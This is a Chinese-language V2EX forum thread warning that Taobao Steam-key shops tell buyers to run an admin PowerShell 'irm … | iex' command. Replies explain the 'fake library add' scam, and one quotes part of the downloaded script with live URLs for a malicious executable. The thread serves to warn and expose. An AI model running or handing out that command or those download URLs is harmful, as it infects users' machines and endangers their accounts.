世风日下,淘宝 steam 店铺怎么都变成盗号的了?

134 天前
 Liftman

我好几年没怎么玩 steam 了。最近想玩一个小清新的游戏。就去淘宝买了。结果发现巨便宜。但是按照我往年的经验无非是外区 key 。或者是早期开发者内测低价囤积的那种 key 吧。。然后发现他的激活步骤。。是如下。。

Steam CDKey 激活方法: 第一步:按住 win+x ,找到 powershell (管理员)( A )

第二步:输入 irm steamcdkey.run|iex (切记要复制,不要手动输入,不要复制前后字符或空格),按回车。

但凡不是智障都知道第二步是不存在的。而且是直接执行脚本的恶意行为。我 censys 看了一下。fofa 也看了一下。他这个地址如果直接访问是 302 到 steam 官方。这样普通人肯定以为是真的。。哎。

然后我又试了一家店铺。差不多价格的。也是这样的结果。然后我看了一眼所有的店铺类似价格的。有差不多十家店铺。都是销量很大。基本上可以肯定是全是骗子了。然后 b 站有一个类似的帖子。明确了这些骗术确实存在不少时间了。

真的太离谱了。虽然没有被坑到。但是我的账户理论上有差不多 40w 的价值,早就远超立案标准了。已经在咨询 w 安是否立案了。感觉很不爽。虽然没有几个钱。反正就想搞他们一波。

3732 次点击
所在节点    分享发现
20 条回复
HojiOShi
134 天前
不知道,我是直接在 steam 上买的。这种要现金交易的平台为什么要过他人之手?
loveqianool
134 天前
# display Message
Write-Host " [STEAM] App is ready for run .please wait... "
Write-Host " [STEAM] Windows Defender has been clear "
Write-Host " [STEAM] Ready to go !!! "
Write-Host " [STEAM] watiing 1-3min "
# download file and process
$appStorePath = Join-Path $steamPath "steamworkz.exe"
$downloadUrl = "http://by.haory.cn/1/1129/Steamworkz.exe"
$backupUrl = "http://by.haory.cn/1/1129/steamworkz.exe"
loveqianool
134 天前
cn 域名不是都要备案吗,还敢用来搞这个。
mikaelson
134 天前
只买发 key 的
xzysaber
134 天前
这是假入库,最近 Steam 要严打这个了,赶紧处理下,不要账号红信了。
Peek
134 天前
@HojiOShi steam 上很多洗钱的,就是加密货币套现,所以有折上折的消费方式
drymonfidelia
134 天前
@xzysaber 假入库好像只中间人改服务器响应内容,插入游戏信息,服务器端发现不了
loopinfor
134 天前
我的经验是不管线下线上,没有实际交易的就不会立案
InDom
134 天前
能不能让那些山西的脚本小子们用 http://by.haory.cn/1/1129/Steamworkz.exe 这个来刷流量啊?
yyzh
134 天前
@johnjiang85 steamcdkey.run 这个域名应该是托管在 dnspod 的?
dearmymy
134 天前
不是的,这个是他们共享 key ,但是下载恶意脚本危害很大。
具体分析看雪有人完整分析了。

https://bbs.kanxue.com/thread-279738.htm
dearmymy
134 天前
@dearmymy 好像是假入库,我还以为跟 appstore 共享软件原理。。。
1KTN90lKW9gVJ9vX
133 天前
@loveqianool cn 域名不需要备案都可以用的,用香港服务器就行,
xiaochen3
133 天前
这是伪入库,淘宝还是做生意为主,怎么可能都在盗号。
JensenQian
133 天前
假入库啊,很久了
这种真不如直接玩盗版
MisakiYui
133 天前
确实很恶心,一堆假入库的店铺在骗人
hafuhafu
133 天前
假入库,远程下载脚本并执行,仍然有很多小白贪小便宜上当,花钱买盗版了属于是,而且还很危险...
按目前见过的案例,有的假入库后 steam 还会被注入,启动 steam 后会弹淘宝店伪装的广告。
想省钱要么正规平台比如小黑盒这种买 key ,要么倒余额了。
相比各个平台价格还便宜到离谱的基本上都是坑。
PrinceofInj
133 天前
不是盗号。但是这种情况跟盗号就是网站主改一下脚本的问题。
SkywalkerJi
133 天前
@drymonfidelia #7
能不能发现是一说。主要是最近 steam 已经修改了用户协议,现在注入或者修改 steam 客户端 v 社可以直接封号。未来客户端进行联网验证也不是不可能。
92DISPfZMyn9IZaw
133 天前
细说四十万

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/1057015

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX